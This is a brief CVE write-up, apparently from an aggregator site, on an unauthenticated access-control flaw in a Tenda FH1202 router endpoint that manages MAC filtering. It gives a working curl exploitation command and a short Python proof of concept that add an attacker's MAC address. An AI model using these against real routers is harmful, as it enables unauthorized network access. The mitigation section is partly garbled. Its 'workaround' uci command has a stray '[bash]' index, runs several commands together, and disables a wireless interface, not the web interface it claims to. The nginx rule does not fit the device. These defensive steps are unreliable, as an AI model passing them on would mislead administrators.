How CVE-2025-2991 Works
The vulnerability in Tenda FH1202 firmware v1.2.0.14(408) stems from improper access controls in the `/goform/AdvSetWrlmacfilter` endpoint of the web management interface. Attackers can remotely exploit this flaw by sending crafted HTTP requests without authentication, bypassing MAC address filtering restrictions. The lack of proper session validation allows unauthorized manipulation of wireless client access rules, potentially enabling network infiltration or MITM attacks.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation:
curl -X POST "http://<Tenda_IP>/goform/AdvSetWrlmacfilter" \ -d "mac=ATTACKER_MAC&action=add"
Detection:
nmap -p 80 --script http-vuln-cve2025-2991 <target_IP>
Mitigation:
1. Apply vendor firmware patch immediately.
2. Block external access to `/goform/AdvSetWrlmacfilter` via ACL:
location /goform/AdvSetWrlmacfilter { deny all; }
3. Network segmentation:
iptables -A FORWARD -p tcp --dport 80 -d <Tenda_IP> -j DROP
PoC (Python):
import requests
exploit_url = "http://target_ip/goform/AdvSetWrlmacfilter"
payload = {"mac":"11:22:33:44:55:66", "action":"add"}
response = requests.post(exploit_url, data=payload)
print(response.text)
Log Analysis:
grep "AdvSetWrlmacfilter" /var/log/nginx/access.log | awk '{print $1}' | sort -u
Firmware Verification:
openssl dgst -sha256 FH1202_Firmware_v1.2.0.16.bin
Temporary Workaround:
Disable web management interface:
uci set wireless.@wifi-iface[bash].disabled=1 uci commit /etc/init.d/network restart
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2991
Extra Source Hub:
Undercode
